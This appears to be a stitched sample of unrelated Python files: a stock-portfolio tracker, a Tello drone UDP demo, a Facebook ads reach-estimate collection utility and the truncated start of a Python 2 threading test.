pygsheets.Cell(pos=f'D{i+2}', val=f'{stock.my_lots}/{stock.sp100_lots}'),
pygsheets.Cell(pos=f'E{i+2}', val=stock.profit)
]
row[2].set_number_format(pygsheets.FormatType.NUMBER, pattern='0.00')
lw = stock.my_lots / max(stock.my_lots, stock.sp100_lots)
row[3].color = (1.0, lw * 2, 0, 0.8) if lw < 0.5 else (2 - lw * 2, 1.0, 0, 0.8)
row[3].set_horizontal_alignment(pygsheets.HorizontalAlignment.RIGHT)
pw = min(1, 0.5 + 0.5 * stock.profit)
row[4].color = (1.0, pw * 2, pw * 2, 0.8) if pw < 0.5 else (2 - pw * 2, 1.0, 2 - pw * 2, 0.8)
row[4].set_number_format(pygsheets.FormatType.PERCENT, pattern='0.00%')
data.extend(row)
wks.update_cells(data)
total_buy_price = self._get_total_buy_price()
total_current_price = self._get_total_current_price()
total_yield = total_current_price - total_buy_price
info_cells = [
pygsheets.Cell(pos='H2', val=f'Portfolio buy price:'),
pygsheets.Cell(pos='I2', val=total_buy_price),
pygsheets.Cell(pos='H3', val=f'Portfolio current price:'),
pygsheets.Cell(pos='I3', val=total_current_price),
pygsheets.Cell(pos='H4', val=f'Portfolio yield:'),
pygsheets.Cell(pos='I4', val=total_yield),
pygsheets.Cell(pos='H5', val=f'Target price:'),
pygsheets.Cell(pos='I5', val=self._expected_portfolio_cost)
]
for i, cell in enumerate(info_cells):
if i % 2 == 0:
cell.set_text_format('bold', True)
else:
cell.set_number_format(pygsheets.FormatType.NUMBER, pattern='0.0')
wks.update_cells(info_cells)
return sh.url
def suggest_shares(self, budget: float) -> List[str]:
shares = []
stocks = {stock.ticker: copy.deepcopy(stock) for stock in self._stocks}
def suggest_one_share() -> Optional[str]:
weights = np.zeros(len(stocks))
tickers = list(stocks.keys())
for i, ticker in enumerate(tickers):
stock = stocks[ticker]
if stock.current_price > budget or stock.my_lots >= stock.sp100_lots:
continue
weights[i] = (stock.sp100_lots - stock.my_lots) * stock.current_price
if weights.sum() == 0.0:
return None
weights /= weights.sum()
return np.random.choice(tickers, p=weights)
while True:
share_to_buy = suggest_one_share()
if share_to_buy is None:
break
shares.append(share_to_buy)
budget -= stocks[share_to_buy].current_price
stocks[share_to_buy].my_lots += 1
return shares
def update_history(self):
total_buy_price = self._get_total_buy_price()
total_current_price = self._get_total_current_price()
today = datetime.today().strftime('%Y-%m-%dT%H:%M:%S')
sp100_current_price = self._get_today_price('^OEX', 'Close')
if sp100_current_price < 1.0:
return
with Path(self._history_path).open('a') as fp:
print(f'{today}\t{total_buy_price}\t{total_current_price}\t{sp100_current_price}', file=fp)
@staticmethod
def visualize_ema(tickers: List[str]):
tickers = list(map(Investments._fix_tickers, tickers))
unique_tickers = list(set(tickers))
prices = Investments._get_historical_price(' '.join(unique_tickers), period='3mo', interval='1h')
total_price = sum(prices[ticker] for ticker in tickers)
dates = [date.strftime('%Y-%m-%d %H:%M:%S') for date in prices.index]
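        # EMA spans are in hourly bars: roughly one trading week (5 days) and one
        # trading month (21 days), assuming ~16 hourly bars per day here.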
ema_5d = total_price.ewm(span=16*5).mean()
ema_1mo = total_price.ewm(span=16*21).mean()
fig = go.Figure()
fig.add_trace(go.Scatter(x=dates, y=total_price.to_numpy(), mode='lines', name='price'))
fig.add_trace(go.Scatter(x=dates, y=ema_5d.to_numpy(), mode='lines', name='ema_5d'))
fig.add_trace(go.Scatter(x=dates, y=ema_1mo.to_numpy(), mode='lines', name='ema_1mo'))
img = fig.to_image(format='png')
return img
def visualize_history(self):
df = pd.read_csv(self._history_path, sep='\t')
total_buy_price = df['total_buy_price'].to_numpy()
total_current_price = df['total_current_price'].to_numpy()
portfolio = np.ones_like(total_buy_price)
multiplier = np.ones_like(total_buy_price)
sp100 = df['sp100_price'] / df.loc[0, 'sp100_price']
coef, m = total_buy_price[0] / total_current_price[0], 1.0
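        # Whenever the invested amount changes (buy price jumps by more than 1.0),
        # fold the previous return into the multiplier so deposits and withdrawals
        # do not show up as jumps in the portfolio performance curve.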
for i in range(1, len(portfolio)):
if abs(total_buy_price[i] - total_buy_price[i - 1]) > 1.0:
m *= (total_current_price[i - 1] / total_buy_price[i - 1]) / (total_current_price[i] / total_buy_price[i])
portfolio[i] = total_current_price[i] / total_buy_price[i] * coef * m
multiplier[i] = m
fig = go.Figure()
fig.add_trace(go.Scatter(x=df['date'], y=multiplier, mode='lines', name='multiplier', line=dict(color='green')))
fig.add_trace(go.Scatter(x=df['date'], y=sp100, mode='lines', name='sp100', line=dict(color='red')))
fig.add_trace(go.Scatter(x=df['date'], y=portfolio, mode='lines', name='portfolio', line=dict(color='blue')))
img = fig.to_image(format='png')
return img
def run_invest_updater(debug=False):
def update():
try:
logging.info('Updating stock info and history')
investments.update_stock_info()
investments.update_history()
except Exception as e:
status_text = f'<b>Error</b>: Failed to update stock info\n' \
f'<b>Exception</b>: {e}\n' \
f'<b>Traceback</b>: {traceback.format_exc()}'
Updater(BOT_TOKEN).bot.send_message(PERSONAL_CHAT_ID, status_text, parse_mode=telegram.ParseMode.HTML)
def track():
while True:
if debug:
update()
else:
update_thread = Thread(target=update, daemon=False)
update_thread.start()
time.sleep(1 * 60 * 60)
if debug:
track()
else:
subthread = Thread(name='invest_updater', target=track, daemon=False)
subthread.start()
investments = Investments(TINKOFF_API_TOKEN, GOOGLE_SA_CONFIG, 'data/history.tsv')
|
tello1.py
|
"""
Low end drone with a raspberry pi to connect i
"""
import threading
import socket
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', 9000))
tello_address = ('192.168.10.1', 8889)
def recv():
while True:
try:
data, server = sock.recvfrom(1518)
print(data.decode(encoding="utf-8"))
except Exception:
print('\nExit . . .\n')
break
print('\n\nTello Python3 Demo.\n')
print('Tello: command takeoff land flip forward back left right\n')
print(' up down cw ccw speed speed?\n')
print('end -- quit demo.\n')
# recvThread create
recvThread = threading.Thread(target=recv)
recvThread.start()
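# Read commands from stdin and forward them to the Tello over UDP; an empty
# line or 'end' quits the demo.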
while True:
try:
msg = input('')
if not msg:
break
if 'end' in msg:
print('...')
sock.close()
break
# Send data
msg = msg.encode(encoding="utf-8")
sent = sock.sendto(msg, tello_address)
except KeyboardInterrupt:
print('\n . . .\n')
sock.close()
break
|
utils.py
|
# -*- coding: utf-8 -*-
import json
from tabulate import tabulate
import pandas as pd
from . import constants
import itertools
import logging
import coloredlogs
import time
from multiprocessing import Process, Manager
import numpy
import requests
import ast
import os
coloredlogs.install(level=logging.INFO)
class RequestException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class JsonFormatException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class FatalException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def print_error_warning(error_json, params):
print_warning("Facebook Error Code: " + str(error_json["error"]["code"]))
print_warning("Facebook Error Message: " + str(error_json["error"]["message"]))
if "error_user_title" in error_json["error"] and "error_user_msg" in error_json["error"]:
print_warning("Facebook: " + str(error_json["error"]["error_user_title"]) + "\n" + str(
error_json["error"]["error_user_msg"]))
print_warning("Facebook Trace Id: " + str(error_json["error"]["fbtrace_id"]))
print_warning("Request Params : " + str(params))
def get_dataframe_from_json_response_query_data(json_response):
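    # Flatten each entry of the Facebook response into one dataframe row, keeping
    # only the configured detail fields (missing fields become None).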
dataframe = pd.DataFrame()
for entry in json_response["data"]:
entry_details = {}
for field in constants.DETAILS_FIELD_FROM_FACEBOOK_TARGETING_SEARCH:
entry_details[field] = entry[field] if field in entry else None
dataframe = dataframe.append(entry_details, ignore_index=True)
return dataframe
def handle_send_request_error(response, url, params, tryNumber):
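    # Retry transient API errors with a linearly growing sleep, return a mocked
    # response for known benign errors (too few users in custom locations,
    # ignored invalid zip codes) and raise FatalException for anything else.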
try:
error_json = json.loads(response.text)
if error_json["error"]["code"] == constants.API_UNKOWN_ERROR_CODE_1 or error_json["error"][
"code"] == constants.API_UNKOWN_ERROR_CODE_2:
print_error_warning(error_json, params)
time.sleep(constants.INITIAL_TRY_SLEEP_TIME * tryNumber)
return send_request(url, params, tryNumber)
elif error_json["error"]["code"] == constants.INVALID_PARAMETER_ERROR and "error_subcode" in error_json[
"error"] and error_json["error"]["error_subcode"] == constants.FEW_USERS_IN_CUSTOM_LOCATIONS_SUBCODE_ERROR:
return get_fake_response()
elif "message" in error_json["error"] and "Invalid zip code" in error_json["error"][
"message"] and constants.INGORE_INVALID_ZIP_CODES:
print_warning("Invalid Zip Code:" + str(params[constants.TARGETING_SPEC_FIELD]))
return get_fake_response()
else:
logging.error("Could not handle error.")
logging.error("Error Code:" + str(error_json["error"]["code"]))
if "message" in error_json["error"]:
logging.error("Error Message:" + str(error_json["error"]["message"]))
if "error_subcode" in error_json["error"]:
logging.error("Error Subcode:" + str(error_json["error"]["error_subcode"]))
raise FatalException(str(error_json["error"]))
except Exception as e:
logging.error(e)
raise FatalException(str(response.text))
def send_request(url, params, tryNumber=0):
tryNumber += 1
if tryNumber >= constants.MAX_NUMBER_TRY:
print_warning("Maximum Number of Tries reached. Failing.")
raise FatalException("Maximum try reached.")
try:
response = requests.get(url, params=params, timeout=constants.REQUESTS_TIMEOUT)
except Exception as error:
        raise RequestException(str(error))
if response.status_code == 200:
return response
else:
return handle_send_request_error(response, url, params, tryNumber)
def call_request_fb(row, token, account):
target_request = row[constants.TARGETING_FIELD]
payload = {
'optimize_for': "NONE",
'optimization_goal': "AD_RECALL_LIFT",
'targeting_spec': json.dumps(target_request),
'access_token': token,
}
payload_str = str(payload)
print_warning("\tSending in request: %s" % (payload_str))
url = constants.REACHESTIMATE_URL.format(account)
response = send_request(url, payload)
return response.content
def get_fake_response():
response = requests.models.Response()
response._content = constants.FAKE_DATA_RESPONSE_CONTENT
response.status_code = 200
logging.warn("Fake Response created: " + response.content)
return response
def trigger_facebook_call(index, row, token, account, shared_queue):
try:
response = call_request_fb(row, token, account)
shared_queue.put((index, response))
except RequestException:
print_warning("Warning Facebook Request Failed")
print_warning("Row: " + str(row))
print_warning("It will try again later")
shared_queue.put((index, numpy.nan))
# except Exception, e:
# print_warning("request failed because %s"%(e))
def add_mocked_column(dataframe):
dataframe["mock_response"] = dataframe["response"].apply(
lambda response: True if (constants.MOCK_RESPONSE_FIELD in str(response)) else False)
return dataframe
def add_timestamp(dataframe):
dataframe["timestamp"] = constants.UNIQUE_TIME_ID
return dataframe
def add_published_platforms(dataframe, input_json):
platforms = constants.PUBLISHER_PLATFORM_DEFAULT
if constants.API_PUBLISHER_PLATFORMS_FIELD in input_json:
platforms = input_json[constants.API_PUBLISHER_PLATFORMS_FIELD]
dataframe[constants.API_PUBLISHER_PLATFORMS_FIELD] = json.dumps(platforms)
return dataframe
def trigger_request_process_and_return_response(rows_to_request):
process_manager = Manager()
shared_queue = process_manager.Queue()
shared_queue_list = []
# Trigger Process in rows
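    # Note: joining each process right after starting it means the requests are
    # issued sequentially; the shared queue just collects (index, response) pairs.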
for index, row in rows_to_request.iterrows():
token, account = get_token_and_account_number_or_wait()
p = Process(target=trigger_facebook_call, args=(index, row, token, account, shared_queue))
p.start()
p.join()
# Put things from shared list to normal list
while shared_queue.qsize() != 0:
shared_queue_list.append(shared_queue.get())
return shared_queue_list
def check_exception(p):
if p.exitcode != 0:
raise FatalException("FatalError: Check logging for clue. No way to proceed from here.")
def print_info(message):
logging.info(message)
def unstrict_literal_eval(string):
try:
value = ast.literal_eval(string)
return value
except ValueError:
return string
except SyntaxError:
return string
def load_dataframe_from_file(file_path):
dataframe = pd.DataFrame.from_csv(file_path)
return dataframe.applymap(unstrict_literal_eval)
def save_response_in_dataframe(shared_queue_list, df):
for result_tuple in shared_queue_list:
result_index = result_tuple[0]
result_response = result_tuple[1]
df.loc[result_index, "response"] = result_response
def save_skeleton_dataframe(dataframe, output_dir=""):
print_info("Saving Skeleton file: " + constants.DATAFRAME_SKELETON_FILE_NAME)
dataframe.to_csv(output_dir + constants.DATAFRAME_SKELETON_FILE_NAME)
def save_temporary_dataframe(dataframe, output_dir=""):
print_info("Saving temporary file: " + constants.DATAFRAME_TEMPORARY_COLLECTION_FILE_NAME)
dataframe.to_csv(output_dir + constants.DATAFRAME_TEMPORARY_COLLECTION_FILE_NAME)
def save_after_collecting_dataframe(dataframe, output_dir=""):
print_info("Saving after collecting file: " + constants.DATAFRAME_AFTER_COLLECTION_FILE_NAME)
dataframe.to_csv(output_dir + constants.DATAFRAME_AFTER_COLLECTION_FILE_NAME)
def save_after_collecting_dataframe_without_full_response(dataframe, output_dir=""):
dataframe = dataframe.drop('response', 1)
print_dataframe(dataframe)
print_info("Saving after collecting file: " + constants.DATAFRAME_AFTER_COLLECTION_FILE_NAME_WITHOUT_FULL_RESPONSE)
dataframe.to_csv(output_dir + constants.DATAFRAME_AFTER_COLLECTION_FILE_NAME_WITHOUT_FULL_RESPONSE)
def remove_temporary_dataframes():
for file in [constants.DATAFRAME_SKELETON_FILE_NAME, constants.DATAFRAME_TEMPORARY_COLLECTION_FILE_NAME]:
os.remove(file)
def print_warning(message):
logging.warn(message)
def load_json_data_from_response(response):
return json.loads(response.content)
def print_dataframe(df):
print(tabulate(df, headers='keys', tablefmt='psql', floatfmt=".0f"))
def build_initial_collection_dataframe():
return pd.DataFrame(columns=constants.DATAFRAME_COLUMNS)
def get_all_combinations_from_input(input_data_json):
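    # Build the cross product of every list-valued input field (and of every key
    # inside dict-valued fields), tagging each value with its field name.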
to_combine_fields = {}
for field in constants.INPUT_FIELDS_TO_COMBINE:
try:
if isinstance(input_data_json[field], list):
field_content = input_data_json[field]
to_combine_fields[field] = field_content
if isinstance(input_data_json[field], dict):
for intra_field_key in list(input_data_json[field].keys()):
to_combine_fields[intra_field_key] = input_data_json[field][intra_field_key]
except KeyError:
print_warning("Field not expecified: " + field)
for field in list(to_combine_fields.keys()):
for index, value in enumerate(to_combine_fields[field]):
to_combine_fields[field][index] = (field, value)
all_combinations = list(itertools.product(*list(to_combine_fields.values())))
return all_combinations
def add_list_of_ANDS_to_input(list_of_ANDS_between_groups, input_data_json):
for interests_to_AND in list_of_ANDS_between_groups:
names = []
and_ors = []
for interest_to_AND in interests_to_AND:
names.append(interest_to_AND[constants.INPUT_NAME_FIELD])
if "or" not in interest_to_AND:
raise Exception("Only AND of ors are supported")
and_ors.append(interest_to_AND["or"])
new_and_interest = {
constants.INPUT_NAME_FIELD: " AND ".join(names),
"and_ors": and_ors,
"isAND": True
}
input_data_json[constants.INPUT_INTEREST_FIELD].append(new_and_interest)
def generate_collection_request_from_combination(current_combination, input_data):
targeting = build_targeting(current_combination, input_data)
dataframe_row = {}
for field in current_combination:
field_name = field[0]
value = field[1]
dataframe_row[field_name] = value
dataframe_row[constants.ALLFIELDS_FIELD] = current_combination
dataframe_row[constants.TARGETING_FIELD] = targeting
dataframe_row[constants.INPUT_NAME_FIELD] = input_data[constants.INPUT_NAME_FIELD]
return dataframe_row
def select_common_fields_in_targeting(targeting, input_combination_dictionary):
# Selecting Geolocation
geo_location = input_combination_dictionary[constants.INPUT_GEOLOCATION_FIELD]
if constants.INPUT_GEOLOCATION_LOCATION_TYPE_FIELD in geo_location:
location_type = geo_location[constants.INPUT_GEOLOCATION_LOCATION_TYPE_FIELD]
else:
location_type = constants.DEFAULT_GEOLOCATION_LOCATION_TYPE_FIELD
targeting[constants.API_GEOLOCATION_FIELD] = {
geo_location["name"]: geo_location["values"],
constants.INPUT_GEOLOCATION_LOCATION_TYPE_FIELD: location_type
}
# Selecting Age
age_range = input_combination_dictionary[constants.INPUT_AGE_RANGE_FIELD]
targeting[constants.API_MIN_AGE_FIELD] = age_range[constants.MIN_AGE] if constants.MIN_AGE in age_range else None
targeting[constants.API_MAX_AGE_FIELD] = age_range[constants.MAX_AGE] if constants.MAX_AGE in age_range else None
# Selecting genders
gender = input_combination_dictionary[constants.INPUT_GENDER_FIELD]
targeting[constants.API_GENDER_FIELD] = [gender]
# Selecting Languages
if constants.INPUT_LANGUAGE_FIELD in input_combination_dictionary:
languages = input_combination_dictionary[constants.INPUT_LANGUAGE_FIELD]
if languages:
targeting[constants.API_LANGUAGES_FIELD] = languages["values"]
else:
print_warning("No field: " + constants.INPUT_LANGUAGE_FIELD)
def get_api_field_name(field_name):
return constants.INPUT_TO_API_FIELD_NAME[field_name]
def process_dau_audience_from_response(literal_response):
aud = json.loads(literal_response)["data"][0]
audience = aud["estimate_dau"]
return int(audience)
def process_mau_audience_from_response(literal_response):
aud = json.loads(literal_response)["data"][0]
audience = aud["estimate_mau"]
return int(audience)
def post_process_collection(collection_dataframe):
# For now just capture audience
print_info("Computing Audience and DAU column")
collection_dataframe["dau_audience"] = collection_dataframe["response"].apply(
lambda x: process_dau_audience_from_response(x))
collection_dataframe["mau_audience"] = collection_dataframe["response"].apply(
lambda x: process_mau_audience_from_response(x))
collection_dataframe = add_mocked_column(collection_dataframe)
return collection_dataframe
def select_advance_targeting_type_array_ids(segment_type, input_value, targeting):
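    # Map the input's "or"/"and"/"not"/"and_ors" groups onto the Graph API
    # targeting format: OR groups become flexible_spec entries, "not" ids go
    # under "exclusions", and AND ids add further flexible_spec entries.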
api_field_name = get_api_field_name(segment_type)
if input_value:
if "or" in input_value:
or_query = []
for or_id in input_value["or"]:
or_query.append({"id": or_id})
targeting["flexible_spec"].append({api_field_name: or_query})
if "and" in input_value:
for id_and in input_value["and"]:
## TODO: make the behavior AND query request less hacky
if segment_type == constants.INPUT_BEHAVIOR_FIELD:
if len(targeting['flexible_spec']) == 1:
targeting['flexible_spec'].append({api_field_name: []})
targeting['flexible_spec'][1][api_field_name].append({"id": id_and})
else:
targeting["flexible_spec"].append({segment_type: {"id": id_and}})
if "not" in input_value:
if not "exclusions" in targeting:
targeting["exclusions"] = {}
if not api_field_name in list(targeting["exclusions"].keys()):
targeting["exclusions"][api_field_name] = []
for id_not in input_value["not"]:
targeting["exclusions"][api_field_name].append({"id": id_not})
if "and_ors" in input_value:
for or_ids in input_value["and_ors"]:
or_query = []
for or_id in or_ids:
or_query.append({"id": or_id})
targeting["flexible_spec"].append({segment_type: or_query})
if "or" not in input_value and "and" not in input_value and "not" not in input_value and "and_ors" not in input_value:
raise JsonFormatException("Something wrong with: " + str(input_value))
def get_interests_by_group_to_AND(input_data_json, groups_ids):
interests_by_group_to_AND = {}
for group_id in groups_ids:
interests_by_group_to_AND[group_id] = []
for interest_input in input_data_json[constants.INPUT_INTEREST_FIELD]:
if interest_input:
if constants.GROUP_ID_FIELD in interest_input:
interest_group_id = interest_input[constants.GROUP_ID_FIELD]
if interest_group_id in interests_by_group_to_AND:
interests_by_group_to_AND[interest_group_id].append(interest_input)
return interests_by_group_to_AND
def select_advance_targeting_type_array_integer(segment_type, input_value, targeting):
api_field_name = get_api_field_name(segment_type)
if input_value:
if "or" in input_value:
targeting["flexible_spec"].append({api_field_name: input_value["or"]})
elif "not" in input_value:
if not "exclusions" in targeting:
targeting["exclusions"] = {}
if not api_field_name in list(targeting["exclusions"].keys()):
targeting["exclusions"][api_field_name] = []
for value in input_value["not"]:
targeting["exclusions"][api_field_name].append(value)
else:
raise JsonFormatException("Something wrong with: " + str(input_value))
def select_advance_targeting_fields(targeting, input_combination_dictionary):
# Selecting Advance Targeting
targeting["flexible_spec"] = []
for advance_field in constants.ADVANCE_TARGETING_FIELDS_TYPE_ARRAY_IDS:
if advance_field in input_combination_dictionary:
select_advance_targeting_type_array_ids(advance_field, input_combination_dictionary[advance_field],
targeting)
for advance_field in constants.ADVANCE_TARGETING_FIELDS_TYPE_ARRAY_INTEGER:
if advance_field in input_combination_dictionary:
select_advance_targeting_type_array_integer(advance_field, input_combination_dictionary[advance_field],
targeting)
return targeting
def select_publisher_platform(targeting, input_data):
# Selecting Publisher Platform
platform = constants.PUBLISHER_PLATFORM_DEFAULT
if constants.API_PUBLISHER_PLATFORMS_FIELD in input_data:
platform = input_data[constants.API_PUBLISHER_PLATFORMS_FIELD]
targeting[constants.API_PUBLISHER_PLATFORMS_FIELD] = platform
def build_targeting(current_combination, input_data):
targeting = {}
input_combination_dictionary = dict(current_combination)
select_common_fields_in_targeting(targeting, input_combination_dictionary)
select_advance_targeting_fields(targeting, input_combination_dictionary)
select_publisher_platform(targeting, input_data)
return targeting
def get_token_and_account_number_or_wait():
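    # Round-robin over the configured (token, account) pairs, reusing a token
    # only once constants.SLEEP_TIME seconds have passed since its last use;
    # sleep and retry when every token is still cooling down.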
if not "used_tokens_time_map" in globals():
global used_tokens_time_map
used_tokens_time_map = {}
while True:
for token, account in constants.TOKENS:
if token in used_tokens_time_map:
last_used_time = used_tokens_time_map[token]
time_since_used = time.time() - last_used_time
if time_since_used > constants.SLEEP_TIME:
used_tokens_time_map[token] = time.time()
return token, account
else:
used_tokens_time_map[token] = time.time()
return token, account
time.sleep(1)
def print_collecting_progress(uncomplete_df, df):
full_size = len(df)
uncomplete_df_size = len(uncomplete_df)
print_info(
"Collecting... Completed: {:.2f}% , {:d}/{:d}".format((float(full_size - uncomplete_df_size) / full_size * 100),
full_size - uncomplete_df_size, full_size))
def send_dumb_query(token, account):
try:
row = pd.Series()
row[constants.TARGETING_FIELD] = constants.DEFAULT_DUMB_TARGETING
call_request_fb(row, token, account)
except Exception as error:
print_warning("Token or Account Number Error:")
print_warning("Token:" + token)
print_warning("Account:" + account)
raise error
def from_FB_polygons_to_KML(poly):
out = ""
for p in poly:
out += "<Polygon><outerBoundaryIs><LinearRing><coordinates>"
for pair in p:
out += " %s,%s" % (pair["lng"], pair["lat"])
out += "</coordinates></LinearRing></outerBoundaryIs></Polygon>"
return out
def double_country_conversion(input):
mapping = {
"AD": "Andorra",
"AE": "United Arab Emirates",
"AF": "Afghanistan",
"AG": "Antigua and Barbuda",
"AL": "Albania",
"AM": "Armenia",
"AO": "Angola",
"AR": "Argentina",
"AS": "American Samoa",
"AT": "Austria",
"AU": "Australia",
"AW": "Aruba",
"AZ": "Azerbaijan",
"BA": "Bosnia and Herzegovina",
"BB": "Barbados",
"BD": "Bangladesh",
"BE": "Belgium",
"BF": "Burkina Faso",
"BG": "Bulgaria",
"BH": "Bahrain",
"BI": "Burundi",
"BJ": "Benin",
"BM": "Bermuda",
"BN": "Brunei",
"BO": "Bolivia",
"BR": "Brazil",
"BS": "Bahamas",
"BT": "Bhutan",
"BW": "Botswana",
"BY": "Belarus",
"BZ": "Belize",
"CA": "Canada",
"CD": "Congo Dem. Rep.",
"CF": "Central African Republic",
"CG": "Congo Rep.",
"CH": "Switzerland",
"CI": "Cote d'Ivoire",
"CK": "Cook Islands",
"CL": "Chile",
"CM": "Cameroon",
"CN": "China",
"CO": "Colombia",
"CR": "Costa Rica",
"CV": "Cape Verde",
"CW": "Curacao",
"CY": "Cyprus",
"CZ": "Czech Republic",
"DE": "Germany",
"DJ": "Djibouti",
"DK": "Denmark",
"DM": "Dominica",
"DO": "Dominican Republic",
"DZ": "Algeria",
"EC": "Ecuador",
"EE": "Estonia",
"EG": "Egypt",
"EH": "Western Sahara",
"ER": "Eritrea",
"ES": "Spain",
"ET": "Ethiopia",
"FI": "Finland",
"FJ": "Fiji",
"FK": "Falkland Islands",
"FM": "Micronesia",
"FO": "Faroe Islands",
"FR": "France",
"GA": "Gabon",
"GB": "United Kingdom",
"GD": "Grenada",
"GE": "Georgia",
"GF": "French Guiana",
"GG": "Guernsey",
"GH": "Ghana",
"GI": "Gibraltar",
"GL": "Greenland",
"GM": "Gambia",
"GN": "Guinea-Bissau",
"GP": "Guadeloupe",
"GQ": "Equatorial Guinea",
"GR": "Greece",
"GT": "Guatemala",
"GU": "Guam",
"GW": "Guinea",
"GY": "Guyana",
"HK": "Hong Kong",
"HN": "Honduras",
"HR": "Croatia",
"HT": "Haiti",
"HU": "Hungary",
"ID": "Indonesia",
"IE": "Ireland",
"IL": "Israel",
"IM": "Isle of Man",
"IN": "India",
"IQ": "Iraq",
"IR": "Iran",
"IS": "Iceland",
"IT": "Italy",
"JE": "Jersey",
"JM": "Jamaica",
"JO": "Jordan",
"JP": "Japan",
"KE": "Kenya",
"KG": "Kyrgyzstan",
"KH": "Cambodia",
"KI": "Kiribati",
"KM": "Comoros",
"KN": "Saint Kitts and Nevis",
"KR": "South Korea",
"KW": "Kuwait",
"KY": "Cayman Islands",
"KZ": "Kazakhstan",
"LA": "Laos",
"LB": "Lebanon",
"LC": "Saint Lucia",
"LI": "Liechtenstein",
"LK": "Sri Lanka",
"LR": "Liberia",
"LS": "Lesotho",
"LT": "Lithuania",
"LU": "Luxembourg",
"LV": "Latvia",
"LY": "Libya",
"MA": "Morocco",
"MC": "Monaco",
"MD": "Moldova",
"ME": "Montenegro",
"MF": "Saint Martin",
"MG": "Madagascar",
"MH": "Marshall Islands",
"MK": "Macedonia",
"ML": "Mali",
"MM": "Myanmar",
"MN": "Mongolia",
"MO": "Macau",
"MP": "Northern Mariana Islands",
"MQ": "Martinique",
"MR": "Mauritania",
"MS": "Montserrat",
"MT": "Malta",
"MU": "Mauritius",
"MV": "Maldives",
"MW": "Malawi",
"MX": "Mexico",
"MY": "Malaysia",
"MZ": "Mozambique",
"NA": "Namibia",
"NC": "New Caledonia",
"NE": "Niger",
"NF": "Norfolk Island",
"NG": "Nigeria",
"NI": "Nicaragua",
"NL": "Netherlands",
"NO": "Norway",
"NP": "Nepal",
"NR": "Nauru",
"NU": "Niue",
"NZ": "New Zealand",
"OM": "Oman",
"PA": "Panama",
"PE": "Peru",
"PF": "French Polynesia",
"PG": "Papua New Guinea",
"PH": "Philippines",
"PK": "Pakistan",
"PL": "Poland",
"PM": "Saint Pierre and Miquelon",
"PN": "Pitcairn",
"PR": "Puerto Rico",
"PS": "Palestine",
"PT": "Portugal",
"PW": "Palau",
"PY": "Paraguay",
"QA": "Qatar",
"RE": "Reunion",
"RO": "Romania",
"RS": "Serbia",
"RU": "Russia",
"RW": "Rwanda",
"SA": "Saudi Arabia",
"SB": "Solomon Islands",
"SC": "Seychelles",
"SE": "Sweden",
"SG": "Singapore",
"SH": "Saint Helena",
"SI": "Slovenia",
"SJ": "Svalbard and Jan Mayen",
"SK": "Slovakia",
"SL": "Sierra Leone",
"SM": "San Marino",
"SN": "Senegal",
"SO": "Somalia",
"SR": "Suriname",
"SS": "South Sudan",
"ST": "Sao Tome and Principe",
"SV": "El Salvador",
"SY": "Syria",
"SX": "Sint Maarten",
"SZ": "Swaziland",
"TC": "Turks and Caicos Islands",
"TD": "Chad",
"TG": "Togo",
"TH": "Thailand",
"TJ": "Tajikistan",
"TK": "Tokelau",
"TL": "Timor-Leste",
"TM": "Turkmenistan",
"TN": "Tunisia",
"TO": "Tonga",
"TR": "Turkey",
"TT": "Trinidad and Tobago",
"TV": "Tuvalu",
"TW": "Taiwan",
"TZ": "Tanzania",
"UA": "Ukraine",
"UG": "Uganda",
"US": "United States",
"UY": "Uruguay",
"UZ": "Uzbekistan",
"VC": "Saint Vincent and the Grenadines",
"VE": "Venezuela",
"VG": "British Virgin Islands",
"VI": "US Virgin Islands",
"VN": "Vietnam",
"VU": "Vanuatu",
"WF": "Wallis and Futuna",
"WS": "Samoa",
"XK": "Kosovo",
"YE": "Yemen",
"YT": "Mayotte",
"ZA": "South Africa",
"ZM": "Zambia",
"ZW": "Zimbabwe",
}
if input in mapping:
return mapping[input]
inverted = dict(zip(mapping.values(), mapping.keys()))
if input in inverted:
return inverted[input]
return None
|
test_threading.py
|
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import sys
import threading
import thread
import time
import unittest
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() * 2
if verbose:
print 'task', self.getName(), 'will run for', delay, 'sec'
self.sema.acquire()
self.mutex.acquire()
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assert_(self.nrunning.get() <= 3)
self.mutex.release()
time.sleep(delay)
if verbose:
print 'task', self.getName(), 'done'
self.mutex.acquire()
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print self.getName(), 'is finished.', self.nrunning.get(), \
'tasks are running'
self.mutex.release()
self.sema.release()
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.isAlive())
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Acquiring an RLock forces an entry for the foreign
# thread to get made in the threading._active map.
r = threading.RLock()
r.acquire()
r.release()
mutex.release()
